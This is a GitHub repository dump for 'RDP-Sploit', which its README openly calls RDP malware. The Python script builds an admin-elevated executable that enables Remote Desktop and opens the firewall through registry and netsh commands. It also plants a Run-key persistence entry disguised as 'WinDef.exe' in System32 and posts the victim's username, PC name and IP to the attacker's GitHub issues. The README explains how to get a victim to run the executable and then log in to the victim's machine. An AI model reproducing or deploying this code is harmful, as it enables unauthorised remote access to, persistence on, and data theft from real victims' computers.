├── CHANGELOG.md ├── RDPSploit.png ├── README.md ├── bin └── rdp-sploit.py └── rdp-sploit.exe /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # v0.3 (Current) 2 | 3 | - One File Payload 4 | - New command `mstsc` and `data` added 5 | - Doesn't Delete tool folder 6 | - Added new file System so you can keep unlimited files 7 | 8 | # previous versions 9 | 10 | - Two File Payload 11 | - Delete's tool folder 12 | - can keep upto one file only 13 | - process fails when the script is in Desktop/RDP-Sploit or Desktop/RDP-Sploit/Client 14 | -------------------------------------------------------------------------------- /RDPSploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4RKH0R1Z0N/RDP-SPLOIT/1b4d0acf078c526ebf5da31f0f0ece7f90cca756/RDPSploit.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
RDP-Sploit

RDP Malware
Made Only For Educational Purposes

15 | 16 | 17 | 18 | ## Table Of Contents 19 | 20 | * [About the Project](#about-the-project) 21 | * [Built With](#built-with) 22 | * [Getting Started](#getting-started) 23 | * [Prerequisites](#prerequisites) 24 | * [Installation](#installation) 25 | * [Usage](#usage) 26 | * [Authors](#authors) 27 | 28 | ## About The Project 29 | 30 | RDP-Sploit is a Tool built for Windows RDP Malware it enables RDP in the Victim Machine and Send the Info of the Victim to the Attacker (You) 31 | 32 | ## Built With 33 | 34 | Also This is Build with GitHub API so You Will need a GitHub Token and give it repo permission. [Click Here to View How to Create a GitHub Token](https://docs.github.com/en/enterprise-cloud@latest/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token) 35 | 36 | ## Getting Started 37 | 38 | How to Install 39 | 40 | ### Prerequisites 41 | 42 | We just need pyinstaller! only one package do the following command below to install it! 43 | ``` 44 | pip install pyinstaller 45 | ``` 46 | 47 | ### Installation 48 | 49 | Installation - 50 | 51 | ``` 52 | git clone https://github.com/D4RKH0R1Z0N/rdp-sploit && cd rdp-sploit && cd bin && python rdp-sploit.py 53 | ``` 54 | 55 | ## Usage 56 | 57 | After Installation and running the script now type create or payload in the script, now Enter the information the Script Asks you (It need to be valid for it to work)

Now Go to the location that the script showed you, and make the victim execute it, it will prompt a uac asking to grant admin permission and click yes now goto your repo on github and click the issue tab copy the IP address and type `mstsc` and wait for the application to open.

Now enter the IP Address, if it asks you for the username enter the name given in the issue title where the ip address is, if you can't find it follow this format (username - pc_name - ip address) Now connect to RDP and that's all You hacked the victim! 58 | 59 | | Status (Client) | Status (Server) | 60 | | --------------- | --------------- | 61 | | Not Tested | Works (Windows 11) | 62 | 63 | ## Authors 64 | 65 | * **D4RKH0R1Z0N** - ** - **[D4RKH0R1Z0N](https://github.com/D4RKH0R1Z0N/)** - ** 66 | -------------------------------------------------------------------------------- /bin/rdp-sploit.py: -------------------------------------------------------------------------------- 1 | # Made by D4RKH0R1Z0N (https://github.com/D4RKH0R1Z0N) 2 | # Star the repo at (https://github.com/D4RKH0R1Z0N/rdp-sploit) Made In Python 3 | 4 | import os 5 | import random 6 | import shutil 7 | from time import sleep 8 | from sys import exit as closeprogram 9 | from sys import platform 10 | import string 11 | 12 | username = os.getlogin() 13 | desk_path = "C:/Users/" + username + "/Desktop" 14 | 15 | def randstr(length): 16 | char_list = string.ascii_lowercase 17 | return ''.join(random.choice(char_list) for i in range(length)) 18 | 19 | def tool_path_c(): 20 | tool_path = desk_path + "/rdp-sploit" 21 | 22 | if os.path.exists(tool_path) and os.path.isdir(tool_path): 23 | os.chdir(tool_path) 24 | tool_path = tool_path + "/client" 25 | if os.path.exists(tool_path) and os.path.isdir(tool_path): 26 | os.chdir(tool_path) 27 | else: 28 | os.mkdir("client") 29 | else: 30 | os.mkdir("rdp-sploit") 31 | tool_path = desk_path + "/rdp-sploit" 32 | os.chdir(tool_path) 33 | os.mkdir("client") 34 | tool_path = desk_path + "/rdp-sploit/client" 35 | os.chdir(tool_path) 36 | 37 | if platform == "win32": 38 | os.system("cls") 39 | access_token = input("Please Enter Your GitHub Token : ") 40 | git_name = input("Please Enter Your GitHub Username : ") 41 | repo_name = input("Please Enter Your Repo Name : ") 42 
| os.system("cls") 43 | print("WARNING : THIS SCRIPT IS MADE FOR EDUCATIONAL PURPOSE ONLY") 44 | print("") 45 | print("YOU HAVE BEEN WARNED!") 46 | sleep(2) 47 | os.system("cls") 48 | 49 | print("Note : The Info of the Victim will be Uploaded to Your Repo, To access it go to the issues tab and the info will be given in the title") 50 | print("This is the Info Format (Username - Computer_Name - IP_Address)") 51 | 52 | def create_payload(): 53 | tool_path_c() 54 | print("") 55 | print("Please Wait Creating Payload...") 56 | file_name = "client-" + randstr(7) + ".py" 57 | 58 | if os.path.exists(file_name) and os.path.isfile(file_name): 59 | file_name = "client-" + randstr(7) + ".py" 60 | 61 | main_file = file_name 62 | main_file_exe = main_file.replace(".py", ".exe") 63 | spec_file = main_file.replace(".py", ".spec") 64 | 65 | def del_build_data(): 66 | dist_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/dist" 67 | home_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/" 68 | build_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/build" 69 | if os.path.exists(build_path) and os.path.isdir(build_path): 70 | shutil.rmtree(build_path) 71 | build_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/__pycache__" 72 | if os.path.exists(build_path) and os.path.isdir(build_path): 73 | shutil.rmtree(build_path) 74 | dst_1 = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/" + main_file_exe 75 | os.remove(spec_file) 76 | os.chdir(dist_path) 77 | os.rename(main_file_exe, dst_1) 78 | os.chdir(home_path) 79 | build_path = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/dist" 80 | if os.path.exists(build_path) and os.path.isdir(build_path): 81 | shutil.rmtree(build_path) 82 | 83 | client_file = open(main_file, "w") 84 | file_loc = "C:/Users/" + username + "/Desktop" + "/rdp-sploit/client/" + main_file_exe 85 | payload_data = """from socket import gethostname, gethostbyname 86 | from requests import post 
87 | from json import dump as dump_data 88 | import os 89 | import PyInstaller.__main__ 90 | import shutil 91 | 92 | access_token = """ + access_token + """ 93 | username = """ + git_name + """ 94 | repo_name = """ + repo_name + """ 95 | 96 | dst = "C:/Windows/System32" 97 | os.chdir(dst) 98 | os.system(""" + '"""' + """reg add """ + '"' + "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" + '"' + """ /v fDenyTSConnections /t REG_DWORD /d 0 /f""" + '"""' + """) 99 | os.system(""" + '"""' + """netsh advfirewall firewall set rule group=""" + '"' + "remote desktop" + '"' + """ new enable=Yes""" + '"""' + """) 100 | os.system(""" + '"""' + """ reg add """ + '"' + "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + '"' + """ /t REG_SZ /d""" + '"' + "C:/Windows/System32/WinDef/WinDef.exe" + '"' + ' ' + '"""' + """) 101 | token = """ + '"' + access_token + '"' +""" 102 | pc_name = gethostname() 103 | client_ip = gethostbyname(pc_name) 104 | nickname = getlogin() 105 | headers = {"Authorization" : "token {}".format(token)} 106 | info = {"title": nickname + " - " + pc_name + " - " + client_ip} 107 | username = """ + '"' + git_name + '"' + """ 108 | Repositoryname = """ + '"' + repo_name + '"' + """ 109 | url = "https://api.github.com/repos/{}/{}/issues".format(username,Repositoryname) 110 | post(url,data=dump_data(info),headers=headers) 111 | 112 | payload = open("WinDef.py", "w") 113 | data = """ + '"""' + """from socket import gethostname, gethostbyname 114 | from requests import post 115 | from json import dump as dump_data 116 | from os import getlogin, system 117 | 118 | system(""" + '"""' + """reg add """ + '"' + "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" + '"' + """ /v fDenyTSConnections /t REG_DWORD /d 0 /f""" + '"""' + """) 119 | system(""" + '"""' + """netsh advfirewall firewall set rule group=""" + '"' + "remote desktop" + '"' + """ new enable=Yes""" + '"""' + """) 120 | system(""" + '"""' + """ reg 
add """ + '"' + "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + '"' + """ /t REG_SZ /d""" + '"' + "C:/Windows/System32/WinDef/WinDef.exe" + '"' + ' ' + '"""' + """) 121 | token = """ + '"' + access_token + '"' +""" 122 | pc_name = gethostname() 123 | client_ip = gethostbyname(pc_name) 124 | nickname = getlogin() 125 | headers = {"Authorization" : "token {}".format(token)} 126 | info = {"title": nickname + " - " + pc_name + " - " + client_ip} 127 | username = """ + '"' + username + '"' + """ 128 | Repositoryname = """ + '"' + repo_name + '"' + """ 129 | url = "https://api.github.com/repos/{}/{}/issues".format(username,Repositoryname) 130 | post(url,data=dump_data(info),headers=headers)""" + '"""' + """exitexit 131 | exit 132 | 133 | payload.write(data) 134 | payload.close 135 | 136 | PyInstaller.__main__.run([ 137 | 'WinDef.py', 138 | '--onefile', 139 | '--uac-admin', 140 | '--noconfirm', 141 | '--windowed' 142 | ]) 143 | 144 | build_path = "C:/Windows/System32/build" 145 | if os.path.exists(build_path) and os.path.isdir(build_path): 146 | shutil.rmtree(build_path) 147 | build_path = "C:/Windows/System32/__pycache__" 148 | if os.path.exists(build_path) and os.path.isdir(build_path): 149 | shutil.rmtree(build_path) 150 | os.remove("WinDef.spec") 151 | os.remove("WinDef.py") 152 | os.rename("dist", "WinDef") 153 | os.chdir("C:/Windows/System32/WinDef") 154 | os.system("WinDef.exe")""" 155 | 156 | client_file.write(payload_data) 157 | client_file.close 158 | os.system("cls") 159 | print("Done... 
Converting...") 160 | sleep(0.8) 161 | os.system("""pyinstaller --noconfirm --onefile --windowed --uac-admin """ + main_file) 162 | os.system("cls") 163 | print("Cleaning Up and Fixing Files...") 164 | del_build_data() 165 | os.chdir(desk_path) 166 | print("File's saved at : " + file_loc) 167 | print("") 168 | print("Note : The Info of the Victim will be Uploaded to Your Repo, To access it go to the issues tab and the info will be given in the title") 169 | print("This is the Info Format (Username - Computer_Name - IP_Address)") 170 | 171 | brand = """ 172 | _ _ _ _ 173 | _ __ __| |_ __ ___ _ __ | | ___ (_| |_ 174 | | '__/ _` | '_ \ _____/ __| '_ \| |/ _ \| | __| 175 | | | | (_| | |_) |_____\__ | |_) | | (_) | | |_ 176 | |_| \__,_| .__/ |___| .__/|_|\___/|_|\__| 177 | |_| |_| 178 | """ 179 | 180 | def banner(): 181 | print(brand) 182 | print("") 183 | print("Your Using RDP-Sploit v1.0") 184 | print("Made by D4RKH0R1Z0N (https://github.com/D4RKH0R1Z0N/)") 185 | print("") 186 | 187 | def main_menu(): 188 | input_1 = input("(RDP-Sploit)> ") 189 | input_1 = input_1.lower() 190 | if input_1 == "credits": 191 | print("") 192 | print("Made by D4RKH0R1Z0N (https://github.com/D4RKH0R1Z0N/)") 193 | main_menu() 194 | elif input_1 == "create" or input_1 == "payload": 195 | create_payload() 196 | main_menu() 197 | elif input_1 == "clear": 198 | os.system("cls") 199 | main_menu() 200 | elif input_1 == "mstsc": 201 | print("Opening Please Wait....") 202 | print("Note : Data should be entered manually...") 203 | sleep(1) 204 | os.system("cls") 205 | print("Close the program to Use this Application") 206 | os.system("mstsc") 207 | os.system("cls") 208 | main_menu() 209 | elif input_1 == "data": 210 | data_link = "https://github.com/" + git_name + "/" + repo_name + "/issues" 211 | print("Opening Info...") 212 | data_ = "start " + data_link 213 | os.system(data_) 214 | os.system("cls") 215 | main_menu() 216 | elif input_1 == "help": 217 | print("") 218 | print("help - Show help 
menu") 219 | print("payload / create - Create Payload") 220 | print("mstsc - Start RDP Connection") 221 | print("data - Show the collected Info") 222 | print("clear - clear's the console") 223 | print("exit - exit the application") 224 | print("") 225 | print("Note : The Info of the Victim will be Uploaded to Your Repo, To access it go to the issues tab and the info will be given in the title") 226 | print("This is the Info Format (Username - Computer_Name - IP_Address)") 227 | print("") 228 | main_menu() 229 | elif input_1 == "exit": 230 | os.system("cls") 231 | banner() 232 | print("") 233 | print("Bye Bye! Meet you Soon Again! :)") 234 | sleep(2) 235 | closeprogram() 236 | else: 237 | print("Please enter a Correct command from below!") 238 | print("") 239 | print("help - Show help menu") 240 | print("payload / create - Create Payload") 241 | print("mstsc - Start RDP Connection") 242 | print("data - Show the collected Info") 243 | print("clear - clear's the console") 244 | print("exit - exit the application") 245 | print("") 246 | print("Note : The Info of the Victim will be Uploaded to Your Repo, To access it go to the issues tab and the info will be given in the title") 247 | print("This is the Info Format (Username - Computer_Name - IP_Address)") 248 | print("") 249 | main_menu() 250 | 251 | def start(): 252 | banner() 253 | print("") 254 | print("help - Show help menu") 255 | print("payload / create - Create Payload") 256 | print("mstsc - Start RDP Connection") 257 | print("data - Show the collected Info") 258 | print("clear - clear's the console") 259 | print("exit - exit the application") 260 | print("") 261 | main_menu() 262 | 263 | start() 264 | else: 265 | print("Please run this in Windows!") 266 | -------------------------------------------------------------------------------- /rdp-sploit.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/D4RKH0R1Z0N/RDP-SPLOIT/1b4d0acf078c526ebf5da31f0f0ece7f90cca756/rdp-sploit.exe --------------------------------------------------------------------------------
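
A detection-side example added here, not part of the repository above: it matches the three host changes visible in the payload strings of `rdp-sploit.py` (RDP enabled via `fDenyTSConnections`, the "remote desktop" firewall group enabled, a `Run` key entry added) in process-creation command lines, and alerts when several occur together on one host. The host names, timestamps and event tuples are constructed sample data; the rule names and the `correlate` function are hypothetical.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviours taken from the command strings visible in rdp-sploit.py above.
RULES = {
    "rdp_enabled": re.compile(
        r'\breg(\.exe)?\s+add\s.*\\Control\\Terminal Server.*'
        r'fDenyTSConnections.*/d\s+(0x)?0+\b', re.I),
    "rdp_firewall_opened": re.compile(
        r'\bnetsh(\.exe)?\s+advfirewall\s+firewall\s+set\s+rule\s.*'
        r'group="?remote desktop"?.*enable=yes', re.I),
    "run_key_added": re.compile(
        r'\breg(\.exe)?\s+add\s.*\\CurrentVersion\\Run\b', re.I),
}

# Constructed process-creation records (host, time, command line), shaped like
# what Security Event ID 4688 or Sysmon Event ID 1 would provide.
SAMPLE = [
    ("WS-014", "2024-05-02T10:15:01",
     r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"'
     r' /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS-014", "2024-05-02T10:15:02",
     'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'),
    ("WS-014", "2024-05-02T10:15:03",
     r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"'
     r' /t REG_SZ /d"C:/Windows/System32/WinDef/WinDef.exe"'),
    # Benign look-alikes: RDP being disabled, and a lone firewall change.
    ("WS-020", "2024-05-02T11:00:00",
     r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
     r' /v fDenyTSConnections /t REG_DWORD /d 1 /f'),
    ("SRV-03", "2024-05-02T09:00:00",
     'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'),
]

def correlate(events, window=timedelta(minutes=10), min_rules=2):
    """Return {host: sorted rule names} for hosts where at least
    `min_rules` distinct behaviours occur within `window`."""
    hits = defaultdict(list)
    for host, ts, cmd in events:
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits[host].append((datetime.fromisoformat(ts), name))
    alerts = {}
    for host, found in hits.items():
        found.sort()
        for i, (start, _) in enumerate(found):
            names = {n for t, n in found[i:] if t - start <= window}
            if len(names) >= min_rules:
                alerts[host] = sorted(names)
                break
    return alerts

if __name__ == "__main__":
    print(correlate(SAMPLE))
```

Requiring two or more behaviours inside the window keeps a single administrative change, such as the lone firewall rule on `SRV-03`, from raising an alert on its own.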